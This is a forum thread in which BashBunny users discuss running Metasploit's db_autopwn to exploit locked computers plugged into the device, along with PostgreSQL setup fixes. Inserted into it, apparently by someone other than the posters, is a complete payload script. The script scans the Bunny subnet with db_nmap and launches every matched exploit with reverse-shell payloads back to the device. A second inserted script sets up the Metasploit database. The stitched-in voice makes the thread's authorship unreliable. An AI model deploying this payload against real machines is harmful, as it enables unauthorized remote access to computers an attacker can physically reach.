Mohamed A. Baset

Metasploit Framework with db_autopwn module on BashBunny


Hi Guys, 
I started this thread to have more discussion about automating similar attacks. In this video I managed (after lots of work and fighting) to first get Ruby running properly, then get the Metasploit Framework installed and running, connected it to a PostgreSQL database, and got db_autopwn running properly on my BashBunny: scanning the Bunny IP range 172.16.64.0/24 with db_nmap, then passing the scan results to the Metasploit exploitation modules, and bingo, we can exploit fully locked devices running vulnerable OSes/services.

Warning: The video is super long (you are free to skip some minutes) because of the humble specifications of the BashBunny device (I wish we could get an upgraded BashBunny 2.0 with at least 1 or 2 GB of memory and a faster processor for this kind of heavy stuff).

Any questions, I'm ready to answer!

Enjoy watching

https://youtu.be/b6U_t8HPKNk

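For readers who want to see the flow the opening post describes as a script rather than a video, here is an added example (mine, not the payload from this thread) of a BashBunny-style payload that starts PostgreSQL, writes an msfconsole resource script that runs db_nmap over the Bunny subnet and hands the results to db_autopwn, and runs it non-interactively. It assumes (my assumptions, not stated in the thread) that Metasploit is checked out at /tools/metasploit-framework, that Ruby comes from rbenv under /root/.rbenv, that the db_autopwn plugin has been placed in /root/.msf4/plugins/db_autopwn.rb, and that the Bunny's own address on the ECM_ETHERNET link is 172.16.64.1; the BashBunny-only commands (ATTACKMODE, LED) are guarded so the file also loads on an ordinary Linux box.

```shell
#!/bin/bash
# Added example, not the payload from this thread: a BashBunny-style payload.txt
# that drives the db_nmap -> db_autopwn flow the opening post describes.
# Assumptions (mine, not stated in the thread): Metasploit is checked out at
# /tools/metasploit-framework, Ruby comes from rbenv under /root/.rbenv, the
# db_autopwn plugin sits in /root/.msf4/plugins/db_autopwn.rb, and the Bunny's
# own address on the ECM_ETHERNET link is 172.16.64.1.
set -u

MSF_DIR="${MSF_DIR:-/tools/metasploit-framework}"
TARGET_RANGE="${TARGET_RANGE:-172.16.64.0/24}"   # the Bunny subnet scanned in the video
BUNNY_IP="${BUNNY_IP:-172.16.64.1}"              # assumed Bunny address; used as LHOST
RC_FILE="${RC_FILE:-/tmp/autopwn.rc}"
LOG_FILE="${LOG_FILE:-/tmp/autopwn.log}"

# Write the msfconsole resource script to $1 for target range $2.
# Using a file (rather than msfconsole -x) leaves a record of exactly what ran.
# db_nmap: version detection only, no OS fingerprinting, to spare RAM and time.
# db_autopwn -p -t: match exploits to open ports and list them (dry run);
# db_autopwn -p -e -r: launch them with reverse-connect payloads back to LHOST.
make_autopwn_rc() {
  cat > "$1" <<EOF
workspace -a bunny
setg LHOST $BUNNY_IP
db_nmap -n -sS -sV -T3 --open --max-retries 1 $2
load db_autopwn
db_autopwn -p -t
db_autopwn -p -e -r
sleep 60
sessions -l
exit
EOF
}

# Start the database, give the slow ARM board time to settle (the thread's
# "lots of sleeps"), then run the resource script non-interactively.
run_autopwn() {
  export PATH="/root/.rbenv/shims:/root/.rbenv/bin:$PATH"
  service postgresql start
  sleep 15
  make_autopwn_rc "$RC_FILE" "$TARGET_RANGE"
  cd "$MSF_DIR" || return 1
  ./msfconsole -q -r "$RC_FILE" > "$LOG_FILE" 2>&1
}

# Only act when running on a Bunny (ATTACKMODE/LED exist there); elsewhere the
# file just defines the functions above.
if command -v ATTACKMODE >/dev/null 2>&1; then
  LED SETUP
  ATTACKMODE ECM_ETHERNET
  LED ATTACK
  if run_autopwn; then LED FINISH; else LED FAIL; fi
fi
```

Keep the `-t` dry run in place the first few times: on a 512 MB board the matching step alone shows whether the scan produced anything worth launching before msfconsole loads every matched exploit module into memory. The scan log and the resource file stay in /tmp so they can be pulled off the Bunny afterwards.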
2 hours ago, Mohamed A. Baset said:

Any questions, I'm ready to answer!

I had no problems with Ruby, but installing Metasploit and setting it up with PostgreSQL has been a PITA.

I tried watching the video, but even with my laptop on fullscreen the text is pretty small, so I can't fully see everything. Do you just run the module in the video, or are you showing the installation process also? I would be interested in the installation step, especially the PostgreSQL setup. Would you show this part in more detail please?

Thank you for your contribution!


Sorry, my bad, my screen resolution is so high. Yes, only running the module, not the installation process. But what problems are you facing?

Installing PostgreSQL is super easy, just the normal installation process, but after finishing the setup there is a trick: add the "postgres" user to the network groups so it will be able to listen on the port and access the socket. (This is the trick that cost me lots of time.)

+ I did a lot of "sleep"s to avoid the memory issues because of the limitations on the Bunny.

I have a suggestion. Metasploit, I'm sure, is painfully slow to run on this device.

(I don't own one)

You can turn this device into a reverse proxy and run Metasploit from a remote machine and tunnel exploits through.

I have been wanting to write a tutorial on how to do this.

1 hour ago, Mohamed A. Baset said:

But what problems are you facing?

I didn't install PostgreSQL as it was already present on the BB; maybe that was the issue, or one of them. I was getting an error when trying to do anything with the PostgreSQL database, like it wouldn't connect. I documented my efforts here along with other stuff.

I will look into the postgres user thing like you suggest.

34 minutes ago, i8igmac said:

I have been wanting to write a tutorial on how to do this.

Woo, sounds cool. If you would write it I would deffo try it.

5 hours ago, i8igmac said:

I have a suggestion. Metasploit, I'm sure, is painfully slow to run on this device.

(I don't own one)

You can turn this device into a reverse proxy and run Metasploit from a remote machine and tunnel exploits through.

I have been wanting to write a tutorial on how to do this.

I don't know if you are familiar with other Hak5 products or not, but the LAN Turtle would be more reliable in the attack scenario you are describing here!

5 hours ago, Just_a_User said:

I didn't install PostgreSQL as it was already present on the BB; maybe that was the issue, or one of them. I was getting an error when trying to do anything with the PostgreSQL database, like it wouldn't connect. I documented my efforts here along with other stuff.

As I mentioned before, this might be 99% an issue with user privileges, because the "postgres" user is not added to the user groups where it can access the network. Try:

usermod -a -G netdev,systemd-network,net_raw postgres

Then tell me if it works or not, + the exact problem if one exists!

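The usermod one-liner above is the fix, but on a fresh Bunny it is only the first step before Metasploit can talk to the database. Here is an added example (mine, not from anyone in this thread) of the full bring-up as a script: it applies the group fix only for the groups the postgres user is actually missing, restarts PostgreSQL, creates the Metasploit role and database if they do not exist, writes ~/.msf4/database.yml (the file the later "database.yml file is not found" post is missing), and checks the result with `db_status`. It assumes (my assumptions) a Debian-style `service postgresql`, Metasploit checked out at /tools/metasploit-framework, and a role and database both named "msf" on 127.0.0.1:5432; the password is generated at run time and never hard-coded.

```shell
#!/bin/bash
# Added example, not from the thread: apply the postgres group fix posted above,
# then create the Metasploit role/database and write ~/.msf4/database.yml.
# Assumptions (mine): Debian-style "service postgresql", Metasploit at
# /tools/metasploit-framework, a DB role and name of "msf" on 127.0.0.1:5432.
set -u

PG_GROUPS="netdev systemd-network net_raw"   # the groups from the usermod fix in the thread
MSF_DB_USER="${MSF_DB_USER:-msf}"
MSF_DB_NAME="${MSF_DB_NAME:-msf}"
MSF_DB_PASS="${MSF_DB_PASS:-$(head -c 18 /dev/urandom | base64)}"   # random, never hard-coded
MSF_DIR="${MSF_DIR:-/tools/metasploit-framework}"

# Print, one per line, the groups from $2.. that are absent from the
# space-separated group list in $1 (the output of `id -nG <user>`).
groups_missing_from() {
  local have="$1" g
  shift
  for g in "$@"; do
    case " $have " in
      *" $g "*) ;;
      *) printf '%s\n' "$g" ;;
    esac
  done
}

# Join newline-separated words with commas, the form usermod -G expects.
join_commas() {
  printf '%s' "$1" | tr '\n' ',' | sed 's/,$//'
}

# Emit the database.yml that msfconsole looks for in ~/.msf4/database.yml.
render_database_yml() {   # $1 user, $2 password, $3 dbname, $4 host, $5 port
  cat <<EOF
development: &pgsql
  adapter: postgresql
  database: $3
  username: $1
  password: $2
  host: $4
  port: $5
  pool: 5
  timeout: 5

production:
  <<: *pgsql

test:
  <<: *pgsql
  database: ${3}_test
EOF
}

# The whole bring-up; run as root on the Bunny. Stops at the first failed step.
setup_msf_db() {
  local have missing
  have="$(id -nG postgres)" || return 1
  missing="$(groups_missing_from "$have" $PG_GROUPS)"
  if [ -n "$missing" ]; then
    usermod -a -G "$(join_commas "$missing")" postgres || return 1
  fi
  service postgresql restart || return 1
  sleep 10                                  # slow board: let the server come up before probing
  pg_isready -h 127.0.0.1 -p 5432 || return 1
  # idempotent role and database creation
  if ! su postgres -c "psql -tAc \"SELECT 1 FROM pg_roles WHERE rolname='$MSF_DB_USER'\"" | grep -q 1; then
    su postgres -c "psql -c \"CREATE ROLE $MSF_DB_USER LOGIN PASSWORD '$MSF_DB_PASS'\"" || return 1
  fi
  if ! su postgres -c "psql -tAc \"SELECT 1 FROM pg_database WHERE datname='$MSF_DB_NAME'\"" | grep -q 1; then
    su postgres -c "createdb -O $MSF_DB_USER $MSF_DB_NAME" || return 1
  fi
  mkdir -p "$HOME/.msf4"
  render_database_yml "$MSF_DB_USER" "$MSF_DB_PASS" "$MSF_DB_NAME" 127.0.0.1 5432 > "$HOME/.msf4/database.yml"
  chmod 600 "$HOME/.msf4/database.yml"      # the file holds the DB password
  (cd "$MSF_DIR" && ./msfconsole -q -x 'db_status; exit')
}

# Only run the bring-up when explicitly asked, so sourcing the file is harmless.
if [ "${1:-}" = "setup" ]; then
  setup_msf_db
fi
```

Run it as `bash setup_msf_db.sh setup` once; on a second run the group, role and database checks all pass through without changes, which makes it safe to keep in the payload's setup stage. If `db_status` still reports no connection afterwards, `pg_isready` and the contents of ~/.msf4/database.yml are the two things to compare against the postgres log.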
6 hours ago, Mohamed A. Baset said:

Then tell me if it works or not + the exact problem if exist!

That totally solved my issue! I had given up on a full MSF install, but this will allow me to continue. Big thanks!

Quote

That totally solved my issue! I had given up on a full MSF install, but this will allow me to continue. Big thanks!

 

Glad to hear that, I suffered too before finally figuring out the real problem. Now we have lots of attack possibilities; share with me the good stuff you're thinking about though :)

I'm planning to release my Metasploit Autopwn bashbunny payload very soon.

Edited by Mohamed A. Baset


@Mohamed A. Baset how did you install Metasploit to the /tools folder? I installed manually and used the .deb file from Rapid7; neither worked.

1 hour ago, b0N3z said:

@Mohamed A. Baset how did you install Metasploit to the /tools folder? I installed manually and used the .deb file from Rapid7; neither worked.

1. Installed Ruby via "rbenv" (2.4.1 armhf is preferred)
2. Cloned Rapid7's Metasploit repo inside /tools/
3. cd to /tools/metasploit-framework/
4. gem install bundler
5. bundle install
6. Bingo!

Edited by Mohamed A. Baset
On 9/1/2017 at 6:15 PM, Mohamed A. Baset said:

Hi Guys,
I started this thread to have more discussion about automating similar attacks. In this video I managed (after lots of work and fighting) to first get Ruby running properly, then get the Metasploit Framework installed and running, connected it to a PostgreSQL database, and got db_autopwn running properly on my BashBunny: scanning the Bunny IP range 172.16.64.0/24 with db_nmap, then passing the scan results to the Metasploit exploitation modules, and bingo, we can exploit fully locked devices running vulnerable OSes/services.

Hey, thanks so much for the work on this payload. I'm having issues using Metasploit; it tells me my database.yml file is not found. Is there any way I can fix this?

Edited by thatalbinofrog
